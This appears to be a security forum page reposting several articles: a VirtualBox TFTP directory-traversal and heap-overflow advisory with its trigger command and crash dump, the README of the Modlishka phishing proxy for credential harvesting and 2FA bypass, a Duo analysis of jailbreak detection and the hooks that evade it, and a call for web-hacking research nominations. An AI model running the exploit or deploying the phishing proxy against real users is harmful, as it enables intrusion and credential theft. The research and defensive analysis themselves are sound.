- Router Advertisement Options to the Rescue – A Deep Dive into DHCPv6, Part 2
- I Don’t Have Any Neighbors – A Deep Dive into DHCPv6, Part 1
- Security Implications of Disruptive Technologies
- IPv6 for Managers
- IPv6 Requirements for Cloud Service Providers
- IPv6 Address Plan Considerations, Part 3: The Plan
- IPv6 Address Plan Considerations, Part 2: The “PI Space from (Single|Multiple) RIR(s) Debate”
- IPv6 Address Plan Considerations, Part 1: General Guidelines

2013
- Design & Configuration of IPv6 Segments with High Security Requirements
- IPv6 Capabilities of Commercial Security Components
- IPAM Requirements in IPv6 Networks
- IPv6 Neighbor Cache Exhaustion Attacks – Risk Assessment & Mitigation Strategies, Part 1

2012
- IPv6 Privacy Extensions

2011
- Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt
- IPv6 Security Part 2, RA Guard – Let’s get practical
- IPv6 Security Part 1, RA Guard – The Theory

Source: https://insinuator.net/2019/01/ipv6-talks-publications/
  15. VirtualBox TFTP server (PXE boot) directory traversal and heap overflow vulnerabilities - [CVE-2019-2552, CVE-2019-2553] In my previous blog post I wrote about VirtualBox DHCP bugs which can be triggered from an unprivileged guest user, in the default configuration and without Guest Additions installed. TFTP server for PXE boot is another attack surface which can be reached from the same configuration. VirtualBox in NAT mode (default configuration) runs a read only TFTP server in the IP address 10.0.2.4 to support PXE boot. CVE-2019-2553 - Directory traversal vulnerability The source code of the TFTP server is at src/VBox/Devices/Network/slirp/tftp.c and it is based on the TFTP server used in QEMU. The below comment can be found in the source: * This code is based on: * * tftp.c - a simple, read-only tftp server for qemu The guest provided file path is validated using the function tftpSecurityFilenameCheck() as below: /** * This function evaluate file name. * @param pu8Payload * @param cbPayload * @param cbFileName * @return VINF_SUCCESS - * VERR_INVALID_PARAMETER - */ DECLINLINE(int) tftpSecurityFilenameCheck(PNATState pData, PCTFTPSESSION pcTftpSession) { size_t cbSessionFilename = 0; int rc = VINF_SUCCESS; AssertPtrReturn(pcTftpSession, VERR_INVALID_PARAMETER); cbSessionFilename = RTStrNLen((const char *)pcTftpSession->pszFilename, TFTP_FILENAME_MAX); if ( !RTStrNCmp((const char*)pcTftpSession->pszFilename, "../", 3) || (pcTftpSession->pszFilename[cbSessionFilename - 1] == '/') || RTStrStr((const char *)pcTftpSession->pszFilename, "/../")) rc = VERR_FILE_NOT_FOUND; /* only allow exported prefixes */ if ( RT_SUCCESS(rc) && !tftp_prefix) rc = VERR_INTERNAL_ERROR; LogFlowFuncLeaveRC(rc); return rc; } This code again is based on the validation done in QEMU (slirp/tftp.c) /* do sanity checks on the filename */ if (!strncmp(req_fname, "../", 3) || req_fname[strlen(req_fname) - 1] == '/' || strstr(req_fname, "/../")) { tftp_send_error(spt, 2, "Access violation", 
tp); return; } Interesting observation here is, above validation done in QEMU is specific to Linux hosts. However, VirtualBox relies on the same validation for Windows hosts too. Since backslash can be used as directory separator in Windows, validations done in tftpSecurityFilenameCheck() can be bypassed to read host files accessible under the privileges of the VirtualBox process. The default path to TFTP root folder is C:\Users\\.VirtualBox\TFTP. Payload to read other files from the host needs to be crafted accordingly. Below is the demo: CVE-2019-2552 - Heap overflow due to incorrect validation of TFTP blocksize option The function tftpSessionOptionParse() sets the value of TFTP options DECLINLINE(int) tftpSessionOptionParse(PTFTPSESSION pTftpSession, PCTFTPIPHDR pcTftpIpHeader) { ... else if (fWithArg) { if (!RTStrICmp("blksize", g_TftpDesc[idxOptionArg].pszName)) { rc = tftpSessionParseAndMarkOption(pszTftpRRQRaw, &pTftpSession->OptionBlkSize); if (pTftpSession->OptionBlkSize.u64Value > UINT16_MAX) rc = VERR_INVALID_PARAMETER; } ... 'blksize' option is checked if the value is > UINT16_MAX. Later the value OptionBlkSize.u64Value gets used in tftpReadDataBlock() to read the file content DECLINLINE(int) tftpReadDataBlock(PNATState pData, PTFTPSESSION pcTftpSession, uint8_t *pu8Data, int *pcbReadData) { RTFILE hSessionFile; int rc = VINF_SUCCESS; uint16_t u16BlkSize = 0; . . . AssertReturn(pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX, VERR_INVALID_PARAMETER); . . . u16BlkSize = (uint16_t)pcTftpSession->OptionBlkSize.u64Value; . . . rc = RTFileRead(hSessionFile, pu8Data, u16BlkSize, &cbRead); . . . } pcTftpSession->OptionBlkSize.u64Value < UINT16_MAX validation is incorrect. During the call to RTFileRead(), the file contents can overflow the buffer adjacent to 'pu8Data' by setting a value for blksize greater than the MTU. This bug can be used in combination with directory traversal bug to trigger the heap overflow with controlled data e.g. 
if shared folders are enabled, the guest can drop a file with arbitrary contents on the host, then read the file using the directory traversal bug.
For ease of debugging, let's use VirtualBox for Linux. Create a file of size, say, UINT16_MAX in the host TFTP root folder, i.e. ~/.config/VirtualBox/TFTP, then read the file from the guest with a large blksize value:
guest@ubuntu:~$ atftp --trace --verbose --option "blksize 65535" --get -r payload -l payload 10.0.2.4
Thread 30 "NAT" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7fff8ccf4700 (LWP 11024)]
[----------------------------------registers-----------------------------------]
RAX: 0x4141414141414141 ('AAAAAAAA')
RBX: 0x7fff8e5f16dc ('A' ...)
RCX: 0x1
RDX: 0x4141414141414141 ('AAAAAAAA')
RSI: 0x800
RDI: 0x140e730 --> 0x219790326
RBP: 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...)
RSP: 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...)
RIP: 0x7fff9457d8a8 (<slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx)
R8 : 0x0
R9 : 0x10
R10: 0x41414141 ('AAAA')
R11: 0x7fff8e5f1de4 ('A' ...)
R12: 0x140e720 --> 0xdead0002
R13: 0x7fff8e5f1704 ('A' ...)
R14: 0x140e7b0 --> 0x7fff8e5f16dc ('A' ...)
R15: 0x140e730 --> 0x219790326
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7fff9457d89f <slirp_uma_alloc>: test rax,rax
   0x7fff9457d8a2 <slirp_uma_alloc>: je 0x7fff9457d8b0 <slirp_uma_alloc>
   0x7fff9457d8a4 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20]
=> 0x7fff9457d8a8 <slirp_uma_alloc>: mov QWORD PTR [rax+0x20],rdx
   0x7fff9457d8ac <slirp_uma_alloc>: mov rax,QWORD PTR [rbx+0x18]
   0x7fff9457d8b0 <slirp_uma_alloc>: mov rdx,QWORD PTR [rbx+0x20]
   0x7fff9457d8b4 <slirp_uma_alloc>: mov QWORD PTR [rdx],rax
   0x7fff9457d8b7 <slirp_uma_alloc>: mov rax,QWORD PTR [r12+0x88]
[------------------------------------stack-------------------------------------]
0000| 0x7fff8ccf39b0 --> 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 (--> ...)
0008| 0x7fff8ccf39b8 --> 0x140e720 --> 0xdead0002
0016| 0x7fff8ccf39c0 --> 0x7fff8e5eddde --> 0x5b0240201045
0024| 0x7fff8ccf39c8 --> 0x140dac4 --> 0x0
0032| 0x7fff8ccf39d0 --> 0x140e730 --> 0x219790326
0040| 0x7fff8ccf39d8 --> 0x140dac4 --> 0x0
0048| 0x7fff8ccf39e0 --> 0x7fff8ccf3a10 --> 0x7fff8ccf3ab0 --> 0x7fff8ccf3bb0 --> 0x7fff8ccf3c90 --> 0x7fff8ccf3cf0 (--> ...)
0056| 0x7fff8ccf39e8 --> 0x7fff9457df41 (<uma_zalloc_arg>: test rax,rax)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
Posted by Reno Robert at 6:41 PM
Sursa: https://www.voidsecurity.in/2019/01/virtualbox-tftp-server-pxe-boot.html
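Both root causes above come down to checks that encode the wrong assumption: a '/'-only separator and a uint16_t range instead of the real buffer size. The following is a minimal hardening sketch under those assumptions, not VirtualBox's actual patch; the function names tftp_filename_is_safe and tftp_blksize_ok are hypothetical. It treats both '/' and '\' as separators and rejects any ".." component, absolute path or drive prefix, and it bounds blksize by the RFC 2348 range (8 to 65464 octets) and by the size of the buffer the block is read into.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: a Windows host accepts '\\' as well as '/',
   so both must be treated as path separators. */
static bool is_path_sep(char c)
{
    return c == '/' || c == '\\';
}

/* Hypothetical replacement for a '/'-only check: returns true only for
   relative paths with no ".." component under either separator. */
bool tftp_filename_is_safe(const char *name)
{
    size_t len = strlen(name);

    if (len == 0)
        return false;
    if (is_path_sep(name[0]))              /* absolute path */
        return false;
    if (len >= 2 && name[1] == ':')        /* drive prefix such as "C:" */
        return false;
    if (is_path_sep(name[len - 1]))        /* trailing separator */
        return false;

    /* Walk the components and reject any that is exactly "..". */
    const char *p = name;
    while (*p != '\0') {
        const char *start = p;
        while (*p != '\0' && !is_path_sep(*p))
            p++;
        if (p - start == 2 && start[0] == '.' && start[1] == '.')
            return false;
        if (*p != '\0')
            p++;                           /* skip the separator */
    }
    return true;
}

/* Hypothetical blksize check: bound the value by the RFC 2348 range and
   by the size of the buffer the data block will actually be read into. */
bool tftp_blksize_ok(uint64_t blksize, size_t data_buf_size)
{
    return blksize >= 8 && blksize <= 65464 && blksize <= data_buf_size;
}
```

Rejecting whole ".." components, rather than matching the "../" prefix and "/../" substring, makes the check independent of which separator the guest chose. It is still not a complete Windows path sanitizer (reserved device names, for example, are not handled).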
  16. ..Modlishka..
Modlishka is a flexible and powerful reverse proxy that will take your phishing campaigns to the next level (with minimal effort required from your side). Enjoy
Features
Some of the most important 'Modlishka' features:
Support for the majority of 2FA authentication schemes (by design).
No website templates (just point Modlishka to the target domain; in most cases, it will be handled automatically).
Full control of "cross" origin TLS traffic flow from your victims' browsers (through custom new techniques).
Flexible and easily configurable phishing scenarios through configuration options.
Pattern-based JavaScript payload injection.
Stripping the website of all encryption and security headers (back to 90's MITM style).
User credential harvesting (with context based on URL parameter passed identifiers).
Can be extended with your ideas through plugins.
Stateless design. Can be scaled up easily for an arbitrary number of users, e.g. through a DNS load balancer.
Web panel with a summary of collected credentials and user session impersonation (beta).
Written in Go.
Action
"A picture is worth a thousand words": Modlishka in action against an example 2FA (SMS) enabled authentication scheme: https://vimeo.com/308709275
Note: google.com was chosen here just as a POC.
Installation
The latest source code version can be fetched from here (zip) or here (tar). Fetch the code with 'go get':
$ go get -u github.com/drk1wi/Modlishka
Compile the binary and you are ready to go:
$ cd $GOPATH/src/github.com/drk1wi/Modlishka/
$ make
# ./dist/proxy -h
Usage of ./dist/proxy:
  -cert string
        base64 encoded TLS certificate
  -certKey string
        base64 encoded TLS certificate key
  -certPool string
        base64 encoded Certification Authority certificate
  -config string
        JSON configuration file. Convenient instead of using command line switches.
  -credParams string
        Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
  -debug
        Print debug information
  -disableSecurity
        Disable security features like anti-SSRF. Disable at your own risk.
  -jsRules string
        Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
  -listeningAddress string
        Listening address (default "127.0.0.1")
  -listeningPort string
        Listening port (default "443")
  -log string
        Local file to which fetched requests will be written (appended)
  -phishing string
        Phishing domain to create - Ex.: target.co
  -plugins string
        Comma seperated list of enabled plugin names (default "all")
  -postOnly
        Log only HTTP POST requests
  -rules string
        Comma separated list of 'string' patterns and their replacements.
  -target string
        Main target to proxy - Ex.: https://target.com
  -targetRes string
        Comma separated list of target subdomains that need to pass through the proxy
  -terminateTriggers string
        Comma separated list of URLs from target's origin which will trigger session termination
  -terminateUrl string
        URL to redirect the client after session termination triggers
  -tls
        Enable TLS (default false)
  -trackingCookie string
        Name of the HTTP cookie used to track the victim (default "id")
  -trackingParam string
        Name of the HTTP parameter used to track the victim (default "id")
Usage
Check out the wiki page for a more detailed overview of the tool usage.
FAQ (Frequently Asked Questions)
Blog post
License
Modlishka was made by Piotr Duszyński (@drk1wi). You can find the license here.
Credits
Thanks for helping with the code go to Giuseppe Trotta (@Giutro).
Disclaimer
This tool is made only for educational purposes and can only be used in legitimate penetration tests. The author does not take any responsibility for any actions taken by its users.
Sursa: https://github.com/drk1wi/Modlishka
  17. JANUARY 18TH, 2019 Jailbreak Detector Detector: An Analysis of Jailbreak Detection Methods and the Tools Used to Evade Them Why Do People Jailbreak? Apple’s software distribution and security model relies on end users running software exclusively distributed by Apple, either via inclusion in the base operating system or via the App Store. To run applications that are not available in the App Store or make modifications to the behavior of the operating system, a “jailbreak” is required—effectively, an exploit that allows the user to gain administrative access to the iOS device. After jailbreaking, users can install applications and tweaks via unofficial app stores. Jailbroken devices are also excellent tools for security researchers. iOS kernel security research is significantly easier with root-level access to the device. Gal Beniamini from Google’s Project Zero says: Apple does not provide a “developer-mode” iPhone, nor is there a mechanism to selectively bypass the security model. This means that in order to meaningfully explore the system, researchers are forced to subvert the device’s security model (i.e., by jailbreaking). In short, people jailbreak their devices for many reasons, ranging from research to personal philosophy. Regardless of the user’s rationale, the presence of a jailbreak on a device means that the security model of the OS can no longer be adequately trusted or reasoned about by an application. The History of Jailbreaking The first iPhone was released in June 2007, and in August 2007, George Hotz became the first person to carrier-unlock the iPhone. A carrier-unlock is not the same as a jailbreak, but in this case, jailbreaking the device was a prerequisite. Hotz’s original exploit required a small hardware modification to the device, but software-only jailbreaks were released soon after. 
Since then, Apple and jailbreak developers have been in a cat-and-mouse game, with Apple patching vulnerabilities while developers and researchers attempt to find new ones. The jailbreak scene has shrunk significantly since the release of the original iPhone. As Apple hardens the security of its iOS devices, exploiting them becomes significantly harder. The value of an iOS exploit on the private market is easily several hundred thousand dollars, and can also exceed $1,000,000 under the right criteria (remote, persistent and zero-click), making a private sale a much more lucrative option than releasing it publicly. Why Do We Care About Jailbreaking at Duo? At Duo, we give administrators insight into the health of devices used to access corporate resources. In a BYOD context, it is important to be able to understand the security properties of the devices on your network. Jailbreaking an iOS device does not, on its own, make it less secure. There are two main issues with the security of a jailbroken device: First, running untrusted (non-App-Store*) code on the device, especially outside of the sandbox, makes it harder to reason about the security properties of the device. The second, more concerning issue is that users of jailbroken devices frequently hold off on updating their devices, as jailbreak development usually lags behind official software releases. Administrators may want to only allow up-to-date devices access to resources on their network, as software updates frequently patch security vulnerabilities. A jailbroken device can masquerade as an up-to-date device by misreporting its software version. As a result, administrators cannot trust version information submitted by jailbroken devices, so it is important to be able to detect the jailbroken state. * While, in general, we can expect that the App Store review process will prevent actively malicious applications from distribution on the App Store, this is not always the case. 
The XcodeGhost malware is an example of how malicious code was shipped as part of well-known and trusted applications on the App Store.
How Are Jailbreaks Usually Detected?
There is only scattered information online about jailbreak detection methodology. This is partially because jailbreak detection is a sort of “special sauce.” Developers of mobile applications would rather keep their methodology private, and there are no real incentives to talk about it publicly. I was able to learn about existing jailbreak detection methods from some online documentation and communities like r/jailbreak, but most of the useful information I learned in the course of this research came from reverse engineering popular anti-jailbreak-detection tools. Most jailbreak detection methods fall into the following categories:
File existence checks
URI scheme registration checks
Sandbox behavior checks
Dynamic linker inspection
File Existence
Most public jailbreak methods leave behind certain files on the filesystem. The clearest example is Cydia. Cydia is an alternative app store commonly used to distribute tweaks (UI changes, extra gestures, etc.) and third-party applications to users of jailbroken devices. As a result, nearly every jailbroken device has a directory at /Applications/Cydia.app. If this directory exists on the filesystem, you can be sure your application is running on a jailbroken device. There are also various binaries such as bash and sshd commonly found on jailbroken devices, as well as files intentionally left by jailbreak utilities to mark that a device has already been jailbroken, preventing the utility from running twice and possibly causing unintended harm.
URI Schemes
iOS applications can register custom URI schemes. Duo uses this functionality so that clickable web links can open the Duo Mobile app, making the setup of Duo Mobile easy. Cydia registered the cydia:// URI scheme to allow direct links to apps available via Cydia.
iOS allows applications to check which URI schemes are registered, so the presence of the cydia:// URI scheme is frequently used to check if Cydia is installed and the device is jailbroken. Unfortunately, some apps perform this detection by attempting to register the cydia:// URI scheme for themselves, so checking if the scheme is registered may produce a false positive on a non-jailbroken device.
Sandbox Behavior
Jailbreaks frequently patch the behavior of the iOS application sandbox. As an example, calls to fork() are disallowed on a stock iOS device: an iOS app may not spawn a child process. If you are able to successfully execute fork(), your code is likely running on a jailbroken device.
Dynamic Linker Inspection
Dynamic linking is a way for executables to take advantage of code provided by other libraries without compiling and shipping that code in the executable. This helps different executables reuse code without including a copy of it. Dynamic linking allows for much smaller binaries with the same functionality; the alternative is “static linking,” where all code that an executable uses is shipped with the executable. While we haven’t discussed them yet, anti-jailbreak-detection tools are frequently loaded as dynamic libraries. The iOS dynamic linker is called dyld, and it exposes the ability to inspect the libraries loaded into the currently running process. As a result, we should be able to detect the presence of anti-jailbreak-detection tools by looking at the names and number of libraries loaded into the current process. If an anti-jailbreak-detection tool is running, we know the device is jailbroken.
How Do End Users Prevent Detection?
Many mobile applications will refuse to run if they detect that the device they are running on is jailbroken. In Duo’s case, we do not prevent use of the Duo Mobile app, but Duo administrators may prevent jailbroken devices from authenticating to protected applications.
For these reasons, users of jailbroken devices frequently install anti-jailbreak-detection tools that aim to hide the tampered status of the device. These tools modify operating system functionality such that the device acts as though it were in an untampered state. They are effectively a type of intentionally installed rootkit, though generally running in userland rather than in the iOS kernel. The specific functions that are hooked and the methods used to hook them vary.
Objective-C Runtime Method Hooking
Objective-C dispatches method calls at runtime. Calling a method is akin to sending a message (à la Smalltalk). This stands in contrast to languages like C, in which a function call might take the form of a jump to the called function’s location in memory. Because method calls are dispatched at runtime, Objective-C also allows you to add or replace methods at runtime. This is sometimes referred to as “method swizzling,” and takes the form of a call to class_addMethod or method_setImplementation. fileExistsAtPath is an Objective-C method commonly used to check for the existence of jailbreak artifacts. Replacing the implementation of fileExistsAtPath to always return false for a list of known jailbreak artifacts is a common strategy to defeat this jailbreak detection technique.
Editing the Linker Table
When a dynamically loaded library is used in an executable, its symbols must be bound: the executable has to figure out where the shared code actually lives in memory. On an iOS system using dyld, a call to printf, for example, is actually a call to an address that lives in the __stubs section. At this address is a single jmp instruction to an address loaded from the __la_symbol_ptr (lazy symbol pointers) or __nl_symbol_ptr (non-lazy symbol pointers) section. Lazy symbol pointers are resolved the first time the function is called, and non-lazy symbol pointers are resolved before the program runs.
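The lazy-binding indirection just described, and the fopen hook discussed next, can be modeled in plain C. This is an illustrative sketch, not dyld's real mechanism: fopen_slot stands in for one __la_symbol_ptr entry, and hooked_fopen, install_fopen_hook, artifact_visible and the forbidden-path list are hypothetical names and examples. Because every check in the model calls through the slot, overwriting that single pointer redirects all of them.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a single __la_symbol_ptr entry: in this model every call
   site calls through this slot instead of calling fopen directly. */
typedef FILE *(*fopen_fn)(const char *path, const char *mode);
static fopen_fn fopen_slot = fopen;

/* The original implementation, saved when the hook is installed. */
static fopen_fn original_fopen = NULL;

/* Illustrative artifact list (examples only, not an exhaustive set). */
static const char *const forbidden_paths[] = {
    "/Applications/Cydia.app",
    "/bin/bash",
    "/bin/sh",
    "/usr/sbin/sshd",
};

/* Hypothetical hook: pretend forbidden paths do not exist, otherwise
   defer to the saved original fopen. */
static FILE *hooked_fopen(const char *path, const char *mode)
{
    size_t n = sizeof forbidden_paths / sizeof forbidden_paths[0];
    for (size_t i = 0; i < n; i++) {
        if (strcmp(path, forbidden_paths[i]) == 0) {
            errno = ENOENT;
            return NULL;
        }
    }
    return original_fopen(path, mode);
}

/* "Patching the table": overwrite the one slot, and every call made
   through it now reaches the hook. */
void install_fopen_hook(void)
{
    if (original_fopen == NULL) {
        original_fopen = fopen_slot;
        fopen_slot = hooked_fopen;
    }
}

/* A detection check that calls through the slot: returns 1 if the
   artifact could be opened, 0 otherwise. */
int artifact_visible(const char *path)
{
    FILE *f = fopen_slot(path, "r");
    if (f == NULL)
        return 0;
    fclose(f);
    return 1;
}
```

On a Linux box, artifact_visible("/bin/sh") reports 1 before install_fopen_hook() and 0 after it, while unrelated paths such as /dev/null keep working because the hook defers to the original function.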
You can read more about how the linker works on Mike Ash’s blog, but the important thing to understand is that the entry in the __xx_symbol_ptr table will, after the symbol has been resolved, contain the proper address for the function being called. A consequence of this design is that if you want to hook every call to printf, you can do so by replacing a single entry in the __la_symbol_ptr section. All calls to printf from that point on will jump to your custom hook. Anti-jailbreak-detection tools make use of this technique to hook functions that may be used to check for file existence or that may expose non-standard sandbox behavior. A typical example is a hooked version of the fopen function. As a reminder, the fopen function will attempt to open a file (by path name), and either return a pointer to the open file handle or NULL if it cannot open the file. If fopen returns non-NULL when called with a path to a known jailbreak artifact, you can be sure the device is jailbroken. A hooked version checks the path of the file to be opened against a list of “forbidden” files. These are known jailbreak artifacts as well as files that are usually present on the system but can only be opened if the sandbox has been modified. The hooked fopen will act as though those files do not exist or cannot be opened, and otherwise defer to the original fopen implementation. Functions like fopen, lstat, etc. are hooked to prevent detection of files on the filesystem. Some other functions, such as fork, are hooked to always return a constant value (for example, a hooked version of fork may return -1, indicating that fork is not allowed, which is consistent with the behavior of an untampered sandbox).
Patching the Linker
We mentioned that dyld exposes functionality that allows clients to inspect what libraries have been loaded into the running process. Anti-jailbreak-detection tools are loaded into processes as shared libraries, and dyld will expose this.
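dyld's image-enumeration API is Apple-specific, so as a rough Linux analog the sketch below reads /proc/self/maps, the kernel's list of the current process's memory mappings, which includes every loaded shared object. This is a swapped-in technique, not how an iOS check would be written; mapping_present, count_suspicious_images and any library names passed to them are hypothetical. Note the weakness the post describes: this check itself calls fopen, so a tool that hooks fopen could hide from it.

```c
#include <stdio.h>
#include <string.h>

/* Returns 1 if any line of /proc/self/maps contains `needle`, 0 if none
   does, and -1 if the file cannot be opened (e.g. not running on Linux). */
int mapping_present(const char *needle)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (f == NULL)
        return -1;

    char line[4096];
    int found = 0;
    while (!found && fgets(line, sizeof line, f) != NULL) {
        if (strstr(line, needle) != NULL)
            found = 1;
    }
    fclose(f);
    return found;
}

/* Hypothetical detector: counts how many names from `suspects` appear
   among the current process's mappings. */
size_t count_suspicious_images(const char *const *suspects, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        if (mapping_present(suspects[i]) == 1)
            hits++;
    }
    return hits;
}
```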
To avoid being listed, some anti-jailbreak-detection tools also hook the exposed dyld functionality to hide their presence. A slightly more interesting way to detect the presence of a jailbreak using the dynamic linker makes use of dlsym to try to determine the addresses of the original, unhooked functions. dlsym should give you the correct address for a dynamically linked function, even if its entry in the linker symbol table has been overwritten. Some anti-jailbreak-detection tools are aware of this, and will actually intercept calls to dlsym and return pointers to the hooked functions. This is an interesting example of the cat-and-mouse game that has been played between app developers who wish to detect jailbroken devices and hobby developers who maintain anti-jailbreak-detection tools.
Summary
These are only some of the methods used to evade jailbreak detection. While they differ in nature, they all rely on various forms of indirection: functionality provided by the Objective-C runtime or by shared libraries can be overridden with ease and made to report “correct” answers, similar to a rootkit. An ideal jailbreak detection method would rely on as little indirection as possible.
Can We Reliably Detect Jailbroken Devices?
We would like to look for artifacts of a jailbroken device (existence of certain files, sandbox behavior, etc.) while relying on as little shared functionality as possible. However, we need to rely on functionality exposed by the operating system to make these checks. In the usual case, to check if a file can be opened, we would call fopen, a wrapper exposed as part of a shared library that ultimately issues the open syscall. As detailed in previous sections, functions in shared libraries might be replaced with tampered versions that prevent our checks from working. As a refresher, a syscall is an interface to privileged functionality exposed to userspace code by the kernel.
It may be dangerous to allow userspace code to directly read or write blocks on a hard drive, for example, so we instead use the open syscall to say “hey kernel, can you please perform the privileged action of opening this file for me, and then give me a handle I can use to interact with it.” Functions like fopen are just that, ordinary functions, but they wrap a special type of instruction used to jump into the kernel. On the x86 architecture, under Linux, the INT 0x80 instruction is the best-known way to perform a syscall (with newer options available, like the x86-64 syscall instruction). INT stands for “interrupt,” and the INT instruction causes the CPU to jump to a special section of code called an interrupt handler, running in the context of the kernel. The end result is that userspace can trigger the execution of privileged code in a controlled manner, without being able to arbitrarily execute privileged code. The iPhone uses the ARM processor architecture. ARM’s equivalent of INT is the SVC opcode (“Supervisor Call”), and on iOS the equivalent of INT 0x80 is SVC 0x80. Functions like fopen may do some sanity-checking and processing of arguments in userspace, but they will eventually use SVC 0x80 to ask the kernel to perform the privileged action of providing access to a file. The important takeaway here is that if we would like to avoid relying on shared wrapper functions that may be hooked, we can perform syscalls directly using the same opcodes the wrapper functions use. We can also inline these calls to avoid having a single call target for our custom syscall wrappers that might be overwritten. This lets us avoid the layers of indirection that come with jumping to functions exposed by shared libraries, shielding us from possible symbol table tampering.
Drawbacks
Even though this approach solves some of our problems, there are drawbacks.
First, writing custom syscall wrappers can require maintenance, especially if there are new architectures you need to support. Additionally, the syscall interface may change over time, and the shared libraries provided by the operating system will keep up with those changes, whereas your custom implementation may not. Second, while this approach makes it harder for end users to evade jailbreak detection, it doesn’t make it impossible. The flow of the data after the syscall (say, a boolean that indicates whether a jailbreak artifact exists) is still vulnerable to tampering. Additionally, a determined attacker could patch out the checks, or even possibly modify the kernel.
Conclusion
Approaches like this must be considered in the context of a threat model. It is impossible to guarantee that you will be able to detect a tampered device for the simple reason that you are restricted to running in userspace, whereas anti-jailbreak-detection utilities can run in a privileged context. With that said, the goal is not perfect security, but rather sufficient security such that the average end user of a jailbroken device, who is not a determined attacker, will not be able to evade detection. Ultimately, the security of your application cannot rely on hiding the way it works. Proper server-side validation of client-submitted data, use of well-known cryptographic protocols, and use of hardware-backed cryptographic functionality available in many newer devices all go a long way to strengthening the security posture of your application without relying on obscurity.
Sursa: https://duo.com/blog/jailbreak-detector-detector
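The inline-syscall idea from the Duo post can be illustrated outside iOS. This sketch targets Linux on x86-64 and AArch64, not iOS (the post's iOS trap is SVC 0x80 and the calling convention differs), so treat it as a demonstration of the technique rather than a drop-in check; raw_syscall4 and path_openable_raw are hypothetical names. The wrapper is forced inline so that each check site carries its own trap instruction instead of jumping through a shared, patchable symbol.

```c
#include <fcntl.h>        /* AT_FDCWD, O_RDONLY */
#include <sys/syscall.h>  /* SYS_openat, SYS_close */

#ifndef AT_FDCWD
#define AT_FDCWD -100     /* Linux value, in case strict modes hide it */
#endif

/* Issues a system call directly with the CPU's trap instruction, so no
   libc wrapper (and no hook placed on one) is involved. Returns the raw
   kernel result: >= 0 on success, -errno on failure. Register usage
   follows the Linux syscall ABI for each architecture. */
static inline __attribute__((always_inline))
long raw_syscall4(long nr, long a1, long a2, long a3, long a4)
{
#if defined(__linux__) && defined(__x86_64__)
    long ret;
    register long r10 __asm__("r10") = a4;   /* 4th argument goes in r10 */
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3), "r"(r10)
                      : "rcx", "r11", "memory");
    return ret;
#elif defined(__linux__) && defined(__aarch64__)
    register long x8 __asm__("x8") = nr;     /* syscall number */
    register long x0 __asm__("x0") = a1;     /* arg 1, also the result */
    register long x1 __asm__("x1") = a2;
    register long x2 __asm__("x2") = a3;
    register long x3 __asm__("x3") = a4;
    __asm__ volatile ("svc #0"
                      : "+r"(x0)
                      : "r"(x8), "r"(x1), "r"(x2), "r"(x3)
                      : "memory");
    return x0;
#else
#error "This sketch only covers Linux on x86-64 and AArch64"
#endif
}

/* Returns 1 if `path` can be opened read-only, 0 otherwise, without
   calling fopen, open or stat from libc. */
int path_openable_raw(const char *path)
{
    long fd = raw_syscall4(SYS_openat, AT_FDCWD, (long)path, O_RDONLY, 0);
    if (fd < 0)
        return 0;
    raw_syscall4(SYS_close, fd, 0, 0, 0);
    return 1;
}
```

As the post's drawbacks note, this only removes the shared-library hop: the syscall numbers and register conventions are per-platform, and a patched binary or a modified kernel can still lie about the result.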
  18. Top 10 web hacking techniques of 2018 - nominations open
James Kettle | 03 January 2019 at 14:43 UTC
Nominations are now open for the top 10 new web hacking techniques of 2018. Every year countless security researchers share their findings with the community. Whether they're elegant attack refinements, empirical studies, or entirely new techniques, many of them contain innovative ideas capable of inspiring new discoveries long after publication. And while some inevitably end up on stage at security conferences, others are easily overlooked amid a sea of overhyped disclosures, and doomed to fade into obscurity. As such, each year we call upon the community to help us seek out, distil, and preserve the very best new research for future readers. As with last year, we’ll do this in three phases:
Jan 1st: Start to collect community nominations
Jan 21st: Launch community vote to build shortlist of top 15
Feb 11th: Panel vote on shortlist to select final top 10
Last year we decided to prevent conflicts of interest by excluding PortSwigger research, but found the diverse voting panel meant we needed a better system. We eventually settled on disallowing panelists from voting on research they’re affiliated with, and adjusting the final scores to compensate. This approach proved fair and effective, so having checked with the community we'll no longer exclude our own research. To nominate a piece of research, either use this form or reply to this Twitter thread. Feel free to make multiple nominations, and nominate your own research, etc. It doesn't matter whether the submission is a blog post, whitepaper, or presentation recording; just try to submit the best format available. If you want, you can take a look at past years’ top 10 to get an idea of what people feel constitutes great research. You can find previous years' results here: 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016/17.
Nominations so far
Here are the nominations so far.
We're making offline archives of them all as we go, so we can replace any that go missing in future. I'll do a basic quality filter before the community vote starts.
How I exploited ACME TLS-SNI-01 issuing Let’s Encrypt SSL-certs for any domain using shared hosting
Kicking the Rims - A Guide for Securely Writing and Auditing Chrome Extensions | The Hacker Blog
EdOverflow | An analysis of logic flaws in web-of-trust services.
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
PowerPoint Presentation - OWASP_AppSec_EU18_WordPress.pdf
Scratching the surface of host headers in Safari
